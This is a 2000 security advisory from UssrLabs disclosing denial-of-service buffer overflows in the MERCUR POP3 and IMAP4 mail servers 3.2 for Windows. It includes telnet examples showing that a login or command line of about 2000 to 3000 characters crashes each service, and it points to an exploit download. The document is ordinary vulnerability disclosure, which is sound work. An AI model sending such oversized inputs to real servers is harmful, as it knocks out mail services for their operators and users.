-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Local / Remote Multiples DoS Attacks in MERCUR v3.2* for Windows
98/NT Vulnerability

USSR Advisory Code:   USSR-2000035

Release Date:
March 15, 2000

Systems Affected:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01) for  Windows 98/NT
MERCUR IMAP4-Server (v3.20.01) for Windows 98/NT

THE PROBLEM

UssrLabs found multiple places in MERCUR v3.20.* where they do not
use proper bounds checking.
The following all result in a Denial of Service against the service
in question.


Example:
[hellme@die-communitech.net$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14 M
ar 2000  03:30:39 -0300
user (buffer)

Where [buffer] is  aprox. 2000 characters.

[hellme@die-communitech.net$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14
 Mar 2000  03:34:09 -0300  
(buffer)

Where [buffer] is aprox. 3000 characters.

Binary or source for this Exploit: 

http://www.ussrback.com/

Exploit: 
the Exploit, crash the remote machine service pop3 and imap


Vendor Status:
informed

Vendor   Url: http://www.atrium-software.com
Program Url: http://www.atrium-software.com/mercur/mercur_e.html

Credit: USSRLABS

SOLUTION
Noting yet.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, HNN, Technotronic and
Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c
h
http://www.ussrback.com


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBONAIJ6VRYEYcg938EQL/AgCg39j7B6rQSXUNK/MQkxlDEmg6WCQAnRey
+gdnd/4H3zK18gDRuZ/TlrzV
=UYs9
-----END PGP SIGNATURE-----